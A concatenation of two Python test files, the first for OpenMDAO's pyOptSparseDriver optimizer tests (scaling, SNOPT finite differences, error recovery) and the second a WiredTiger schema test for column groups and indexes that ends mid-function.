if OPTIMIZER is not 'SNOPT':
raise unittest.SkipTest()
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = - x + y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
prob.driver.options['gradient method'] = 'snopt_fd'
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', upper=-15.0)
prob.setup(check=False)
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'], 7.16667, 1e-6)
assert_rel_error(self, prob['y'], -7.833334, 1e-6)
def test_snopt_fd_is_called(self):
if OPTIMIZER is not 'SNOPT':
raise unittest.SkipTest()
class ParaboloidApplyLinear(Paraboloid):
def apply_linear(params, unknowns, resids):
raise Exception("OpenMDAO's finite difference has been called. snopt_fd\
\ option has failed.")
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', ParaboloidApplyLinear(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = - x + y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
prob.driver.options['gradient method'] = 'snopt_fd'
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', upper=-15.0)
prob.setup(check=False)
prob.run_driver()
def test_snopt_fd_option_error(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = - x + y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = 'SLSQP'
prob.driver.options['gradient method'] = 'snopt_fd'
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', upper=-15.0)
prob.setup(check=False)
with self.assertRaises(Exception) as raises_cm:
prob.run_driver()
exception = raises_cm.exception
msg = "SNOPT's internal finite difference can only be used with SNOPT"
self.assertEqual(exception.args[0], msg)
def test_unsupported_multiple_obj(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('comp2', Paraboloid())
model.add_subsystem('con', ExecComp('c = - x + y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = 'SLSQP'
prob.driver.options['gradient method'] = 'snopt_fd'
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_objective('comp2.f_xy')
model.add_constraint('c', upper=-15.0)
expected = 'Multiple objectives have been added to pyOptSparseDriver' \
' but the selected optimizer (SLSQP) does not support' \
' multiple objectives.'
prob.setup(check=False)
with self.assertRaises(RuntimeError) as cm:
prob.final_setup()
self.assertEqual(str(cm.exception), expected)
def test_simple_paraboloid_scaled_desvars_fwd(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = x - y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SNOPT':
prob.driver.opt_settings['Verify level'] = 3
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0, ref=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0, ref=50.0)
model.add_objective('f_xy')
model.add_constraint('c', lower=10.0, upper=11.0)
prob.setup(check=False, mode='fwd')
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'] - prob['y'], 11.0, 1e-6)
def test_simple_paraboloid_scaled_desvars_fd(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = x - y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SNOPT':
prob.driver.opt_settings['Verify level'] = 3
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0, ref=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0, ref=50.0)
model.add_objective('f_xy')
model.add_constraint('c', lower=10.0, upper=11.0)
model.approx_totals(method='fd')
prob.setup(check=False)
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'] - prob['y'], 11.0, 1e-6)
def test_simple_paraboloid_scaled_desvars_cs(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = x - y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SNOPT':
prob.driver.opt_settings['Verify level'] = 3
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0, ref=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0, ref=50.0)
model.add_objective('f_xy')
model.add_constraint('c', lower=10.0, upper=11.0)
model.approx_totals(method='cs')
prob.setup(check=False)
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'] - prob['y'], 11.0, 1e-6)
def test_simple_paraboloid_scaled_desvars_rev(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = x - y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SNOPT':
prob.driver.opt_settings['Verify level'] = 3
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0, ref=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0, ref=50.0)
model.add_objective('f_xy')
model.add_constraint('c', lower=10.0, upper=11.0)
prob.setup(check=False, mode='rev')
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'] - prob['y'], 11.0, 1e-6)
def test_simple_paraboloid_scaled_constraint_fwd(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = x - y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SNOPT':
prob.driver.opt_settings['Verify level'] = 3
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', lower=10.0, upper=11.0, ref=10.)
prob.setup(check=False, mode='fwd')
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'] - prob['y'], 11.0, 1e-6)
def test_simple_paraboloid_scaled_constraint_fd(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = x - y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SNOPT':
prob.driver.opt_settings['Verify level'] = 3
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', lower=10.0, upper=11.0, ref=10.)
model.approx_totals(method='fd')
prob.setup(check=False)
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'] - prob['y'], 11.0, 1e-6)
def test_simple_paraboloid_scaled_constraint_cs(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = x - y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SNOPT':
prob.driver.opt_settings['Verify level'] = 3
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', lower=10.0, upper=11.0, ref=10.)
model.approx_totals(method='cs')
prob.setup(check=False)
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'] - prob['y'], 11.0, 1e-6)
def test_simple_paraboloid_scaled_constraint_rev(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = x - y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SNOPT':
prob.driver.opt_settings['Verify level'] = 3
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', lower=10.0, upper=11.0, ref=10.)
prob.setup(check=False, mode='rev')
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'] - prob['y'], 11.0, 1e-6)
def test_simple_paraboloid_scaled_objective_fwd(self):
prob = Problem()
model = prob.model = Group()
prob.set_solver_print(level=0)
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = x - y'), promotes=['*'])
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SNOPT':
prob.driver.opt_settings['Verify level'] = 3
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy', ref=10.)
model.add_constraint('c', lower=10.0, upper=11.0)
prob.setup(check=False, mode='fwd')
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'] - prob['y'], 11.0, 1e-6)
def test_simple_paraboloid_scaled_objective_rev(self):
prob = Problem()
model = prob.model = Group()
prob.set_solver_print(level=0)
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = x - y'), promotes=['*'])
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SNOPT':
prob.driver.opt_settings['Verify level'] = 3
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy', ref=10.)
model.add_constraint('c', lower=10.0, upper=11.0)
prob.setup(check=False, mode='rev')
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'] - prob['y'], 11.0, 1e-6)
def test_sellar_mdf(self):
prob = Problem()
model = prob.model = SellarDerivativesGrouped()
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SNOPT':
prob.driver.opt_settings['Verify level'] = 3
prob.driver.options['print_results'] = False
model.add_design_var('z', lower=np.array([-10.0, 0.0]), upper=np.array([10.0, 10.0]))
model.add_design_var('x', lower=0.0, upper=10.0)
model.add_objective('obj')
model.add_constraint('con1', upper=0.0)
model.add_constraint('con2', upper=0.0)
prob.setup(check=False, mode='rev')
prob.run_driver()
assert_rel_error(self, prob['z'][0], 1.9776, 1e-3)
assert_rel_error(self, prob['z'][1], 0.0, 1e-3)
assert_rel_error(self, prob['x'], 0.0, 1e-3)
def test_analysis_error_objfunc(self):
# Component raises an analysis error during some runs, and pyopt
# attempts to recover.
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', ParaboloidAE(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = - x + y'), promotes=['*'])
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SLSQP':
prob.driver.opt_settings['ACC'] = 1e-9
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', upper=-15.0)
prob.setup(check=False)
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'], 7.16667, 1e-6)
assert_rel_error(self, prob['y'], -7.833334, 1e-6)
# Normally it takes 9 iterations, but takes 13 here because of the
# analysis failures. (note SLSQP takes 5 instead of 4)
if OPTIMIZER == 'SLSQP':
self.assertEqual(prob.driver.iter_count, 7)
else:
self.assertEqual(prob.driver.iter_count, 15)
def test_raised_error_objfunc(self):
# Component fails hard this time during execution, so we expect
# pyoptsparse to raise.
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
comp = model.add_subsystem('comp', ParaboloidAE(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = - x + y'), promotes=['*'])
prob.driver = pyOptSparseDriver()
# SNOPT has a weird cleanup problem when this fails, so we use SLSQP. For the
# regular failure, it doesn't matter which opt we choose since they all fail through.
prob.driver.options['optimizer'] = 'SLSQP'
prob.driver.opt_settings['ACC'] = 1e-9
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', upper=-15.0)
comp.fail_hard = True
prob.setup(check=False)
with self.assertRaises(Exception) as err:
prob.run_driver()
# pyopt's failure message differs by platform and is not informative anyway
def test_analysis_error_sensfunc(self):
# Component raises an analysis error during some linearize calls, and
# pyopt attempts to recover.
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
comp = model.add_subsystem('comp', ParaboloidAE(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = - x + y'), promotes=['*'])
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SLSQP':
prob.driver.opt_settings['ACC'] = 1e-9
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', upper=-15.0)
comp.grad_fail_at = 2
comp.eval_fail_at = 100
prob.setup(check=False)
prob.run_driver()
# SLSQP does a bad job recovering from gradient failures
if OPTIMIZER == 'SLSQP':
tol = 1e-2
else:
tol = 1e-6
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'], 7.16667, tol)
assert_rel_error(self, prob['y'], -7.833334, tol)
# Normally it takes 9 iterations, but takes 13 here because of the
# gradfunc failures. (note SLSQP just doesn't do well)
if OPTIMIZER == 'SNOPT':
self.assertEqual(prob.driver.iter_count, 15)
def test_raised_error_sensfunc(self):
# Component fails hard this time during gradient eval, so we expect
# pyoptsparse to raise.
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
comp = model.add_subsystem('comp', ParaboloidAE(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = - x + y'), promotes=['*'])
prob.driver = pyOptSparseDriver()
# SNOPT has a weird cleanup problem when this fails, so we use SLSQP. For the
# regular failure, it doesn't matter which opt we choose since they all fail through.
prob.driver.options['optimizer'] = 'SLSQP'
prob.driver.opt_settings['ACC'] = 1e-9
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', upper=-15.0)
comp.fail_hard = True
comp.grad_fail_at = 2
comp.eval_fail_at = 100
prob.setup(check=False)
with self.assertRaises(Exception) as err:
prob.run_driver()
# pyopt's failure message differs by platform and is not informative anyway
del prob
class TestPyoptSparseFeature(unittest.TestCase):
def setUp(self):
if OPT is None:
raise unittest.SkipTest("pyoptsparse is not installed")
if OPTIMIZER is None:
raise unittest.SkipTest("pyoptsparse is not providing SNOPT or SLSQP")
def test_basic(self):
prob = Problem()
model = prob.model = SellarDerivativesGrouped()
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = "SLSQP"
model.add_design_var('z', lower=np.array([-10.0, 0.0]), upper=np.array([10.0, 10.0]))
model.add_design_var('x', lower=0.0, upper=10.0)
model.add_objective('obj')
model.add_constraint('con1', upper=0.0)
model.add_constraint('con2', upper=0.0)
prob.set_solver_print(level=0)
prob.setup(check=False, mode='rev')
prob.run_driver()
assert_rel_error(self, prob['z'][0], 1.9776, 1e-3)
def test_settings_print(self):
prob = Problem()
model = prob.model = SellarDerivativesGrouped()
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = "SLSQP"
prob.driver.options['print_results'] = False
model.add_design_var('z', lower=np.array([-10.0, 0.0]), upper=np.array([10.0, 10.0]))
model.add_design_var('x', lower=0.0, upper=10.0)
model.add_objective('obj')
model.add_constraint('con1', upper=0.0)
model.add_constraint('con2', upper=0.0)
prob.set_solver_print(level=0)
prob.setup(check=False, mode='rev')
prob.run_driver()
assert_rel_error(self, prob['z'][0], 1.9776, 1e-3)
def test_slsqp_atol(self):
prob = Problem()
model = prob.model = SellarDerivativesGrouped()
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = "SLSQP"
prob.driver.opt_settings['ACC'] = 1e-9
model.add_design_var('z', lower=np.array([-10.0, 0.0]), upper=np.array([10.0, 10.0]))
model.add_design_var('x', lower=0.0, upper=10.0)
model.add_objective('obj')
model.add_constraint('con1', upper=0.0)
model.add_constraint('con2', upper=0.0)
prob.set_solver_print(level=0)
prob.setup(check=False, mode='rev')
prob.run_driver()
assert_rel_error(self, prob['z'][0], 1.9776, 1e-3)
def test_slsqp_maxit(self):
prob = Problem()
model = prob.model = SellarDerivativesGrouped()
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = "SLSQP"
prob.driver.opt_settings['MAXIT'] = 3
model.add_design_var('z', lower=np.array([-10.0, 0.0]), upper=np.array([10.0, 10.0]))
model.add_design_var('x', lower=0.0, upper=10.0)
model.add_objective('obj')
model.add_constraint('con1', upper=0.0)
model.add_constraint('con2', upper=0.0)
prob.set_solver_print(level=0)
prob.setup(check=False, mode='rev')
prob.run_driver()
assert_rel_error(self, prob['z'][0], 1.98337708, 1e-3)
@unittest.skipIf(OPTIMIZER in [None, "SLSQP"], "pyoptsparse is not providing SNOPT" )
def test_snopt_atol(self):
prob = Problem()
model = prob.model = SellarDerivativesGrouped()
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = "SNOPT"
prob.driver.opt_settings['Major feasibility tolerance'] = 1e-9
model.add_design_var('z', lower=np.array([-10.0, 0.0]), upper=np.array([10.0, 10.0]))
model.add_design_var('x', lower=0.0, upper=10.0)
model.add_objective('obj')
model.add_constraint('con1', upper=0.0)
model.add_constraint('con2', upper=0.0)
prob.set_solver_print(level=0)
prob.setup(check=False, mode='rev')
prob.run_driver()
assert_rel_error(self, prob['z'][0], 1.9776, 1e-3)
@unittest.skipIf(OPTIMIZER in [None, "SLSQP"], "pyoptsparse is not providing SNOPT" )
def test_snopt_maxit(self):
prob = Problem()
model = prob.model = SellarDerivativesGrouped()
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = "SNOPT"
prob.driver.opt_settings['Major iterations limit'] = 4
model.add_design_var('z', lower=np.array([-10.0, 0.0]), upper=np.array([10.0, 10.0]))
model.add_design_var('x', lower=0.0, upper=10.0)
model.add_objective('obj')
model.add_constraint('con1', upper=0.0)
model.add_constraint('con2', upper=0.0)
prob.set_solver_print(level=0)
prob.setup(check=False, mode='rev')
prob.run_driver()
assert_rel_error(self, prob['z'][0], 1.9780247, 1e-3)
if __name__ == "__main__":
unittest.main()
|
py | b404261c0660a7d91a3a76b45506283cf7c31dcb | #!/usr/bin/env python
#
# Public Domain 2014-2016 MongoDB, Inc.
# Public Domain 2008-2014 WiredTiger, Inc.
#
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
import wiredtiger, wttest
from wtscenario import check_scenarios
# test_schema02.py
# Columns, column groups, indexes
class test_schema02(wttest.WiredTigerTestCase):
"""
Test basic operations
"""
nentries = 1000
scenarios = check_scenarios([
('normal', { 'idx_config' : '' }),
('lsm', { 'idx_config' : ',type=lsm' }),
])
def expect_failure_colgroup(self, name, configstr, match):
self.assertRaisesWithMessage(wiredtiger.WiredTigerError,
lambda:self.session.create("colgroup:" + name, configstr), match)
def test_colgroup_after_failure(self):
# bogus formats
self.assertRaisesWithMessage(wiredtiger.WiredTigerError,
lambda:self.session.create("table:main",
"key_format=Z,value_format=S"),
"/Invalid type 'Z' found in format 'Z'/")
self.assertRaisesWithMessage(wiredtiger.WiredTigerError,
lambda:self.session.create("table:main",
"key_format=S,value_format=Z"),
"/Invalid type 'Z' found in format 'Z'/")
# These should succeed
self.session.create("table:main", "key_format=iS,value_format=SiSi,"
"columns=(ikey,Skey,S1,i2,S3,i4),colgroups=(c1,c2)")
self.session.create("colgroup:main:c1", "columns=(S1,i2)")
def test_colgroup_failures(self):
# too many columns
self.assertRaisesWithMessage(wiredtiger.WiredTigerError,
lambda:self.session.create("table:main", "key_format=S,"
"value_format=,columns=(a,b)"),
"/Number of columns in '\(a,b\)' does not match "
"key format 'S' plus value format ''/")
# Note: too few columns is allowed
# expect this to work
self.session.create("table:main", "key_format=iS,value_format=SiSi,"
"columns=(ikey,Skey,S1,i2,S3,i4),"
"colgroups=(c1,c2)")
# bad table name
self.expect_failure_colgroup("nomatch:c", "columns=(S1,i2)",
"/Can't create 'colgroup:nomatch:c'"
" for non-existent table 'nomatch'/")
# colgroup not declared in initial create
self.expect_failure_colgroup("main:nomatch", "columns=(S1,i2)",
"/Column group 'nomatch' not found"
" in table 'main'/")
# bad column
self.expect_failure_colgroup("main:c1", "columns=(S1,i2,bad)",
"/Column 'bad' not found/")
# TODO: no columns allowed, or not?
#self.session.create("colgroup:main:c0", "columns=()")
# key in a column group
self.expect_failure_colgroup("main:c1", "columns=(ikey,S1,i2)",
"/A column group cannot store key column"
" 'ikey' in its value/")
# expect this to work
self.session.create("colgroup:main:c1", "columns=(S1,i2)")
# exclusive: no error message
self.expect_failure_colgroup("main:c1", "columns=(S1,i2),exclusive",
"")
# colgroup not declared in initial create
self.expect_failure_colgroup("main:c3", "columns=(S3,i4)",
"/Column group 'c3' not found in"
" table 'main'/")
# this is the last column group, but there are missing columns
self.expect_failure_colgroup("main:c2", "columns=(S1,i4)",
"/Column 'S3' in 'table:main' does not"
" appear in a column group/")
# TODO: is repartitioning column groups allowed?
# this does not raise an error
# self.expect_failure_colgroup("main:c2", "columns=(S1,S3,i4)"
# expect this to work
self.session.create("colgroup:main:c2", "columns=(S3,i4)")
# expect these to work - each table name is a separate namespace
self.session.create("table:main2", "key_format=iS,value_format=SiSi,"
"columns=(ikey,Skey,S1,i2,S3,i4),colgroups=(c1,c2)")
self.session.create("colgroup:main2:c1", "columns=(S1,i2)")
self.session.create("colgroup:main2:c2", "columns=(S3,i4)")
def test_index(self):
self.session.create("table:main", "key_format=iS,value_format=SiSi,"
"columns=(ikey,Skey,S1,i2,S3,i4),colgroups=(c1,c2)")
# should be able to create colgroups before indices
self.session.create("colgroup:main:c2", "columns=(S3,i4)")
# should be able to create indices on all key combinations
self.session.create(
"index:main:ikey", "columns=(ikey)" + self.idx_config)
self.session.create(
"index:main:Skey", "columns=(Skey)" + self.idx_config)
self.session.create(
"index:main:ikeySkey", "columns=(ikey,Skey)" + self.idx_config)
self.session.create(
"index:main:Skeyikey", "columns=(Skey,ikey)" + self.idx_config)
# should be able to create indices on all value combinations
self.session.create(
"index:main:S1", "columns=(S1)" + self.idx_config)
self.session.create(
"index:main:i2", "columns=(i2)" + self.idx_config)
self.session.create(
"index:main:i2S1", "columns=(i2,S1)" + self.idx_config)
self.session.create(
"index:main:S1i4", "columns=(S1,i4)" + self.idx_config)
# somewhat nonsensical to repeat columns within an index, but allowed
self.session.create(
"index:main:i4S3i4S1", "columns=(i4,S3,i4,S1)" + self.idx_config)
# should be able to create colgroups after indices
self.session.create("colgroup:main:c1", "columns=(S1,i2)")
self.populate()
# should be able to create indices after populating
self.session.create(
"index:main:i2S1i4", "columns=(i2,S1,i4)" + self.idx_config)
self.check_entries()
self.check_indices()
def populate(self):
cursor = self.session.open_cursor('table:main', None, None)
for i in range(0, self.nentries):
square = i * i
cube = square * i
cursor[(i, 'key' + str(i))] = \
('val' + str(square), square, 'val' + str(cube), cube)
cursor.close()
def check_entries(self):
cursor = self.session.open_cursor('table:main', None, None)
# spot check via search
n = self.nentries
for i in (n / 5, 0, n - 1, n - 2, 1):
cursor.set_key(i, 'key' + str(i))
square = i * i
cube = square * i
cursor.search()
(s1, i2, s3, i4) = cursor.get_values()
self.assertEqual(s1, 'val' + str(square))
self.assertEqual(i2, square)
self.assertEqual(s3, 'val' + str(cube))
self.assertEqual(i4, cube)
i = 0
count = 0
# then check all via cursor
cursor.reset()
for ikey, skey, s1, i2, s3, i4 in cursor:
i = ikey
square = i * i
cube = square * i
self.assertEqual(ikey, i)
self.assertEqual(skey, 'key' + str(i))
self.assertEqual(s1, 'val' + str(square))
self.assertEqual(i2, square)
self.assertEqual(s3, 'val' + str(cube))
self.assertEqual(i4, cube)
count += 1
cursor.close()
self.assertEqual(count, n)
def check_indices(self):
# we check an index that was created before populating
cursor = self.session.open_cursor('index:main:S1i4', None, None)
count = 0
n = self.nentries
for s1key, i4key, s1, i2, s3, i4 in cursor:
i = int(i4key ** (1 / 3.0) + 0.0001) # cuberoot
#self.tty('index:main:S1i4[' + str(i) + '] (' +
# str(s1key) + ',' +
# str(i4key) + ') -> (' +
# str(s1) + ',' +
# str(i2) + ',' +
# str(s3) + ',' +
# str(i4) + ')')
self.assertEqual(s1key, s1)
self.assertEqual(i4key, i4)
ikey = i
skey = 'key' + str(i)
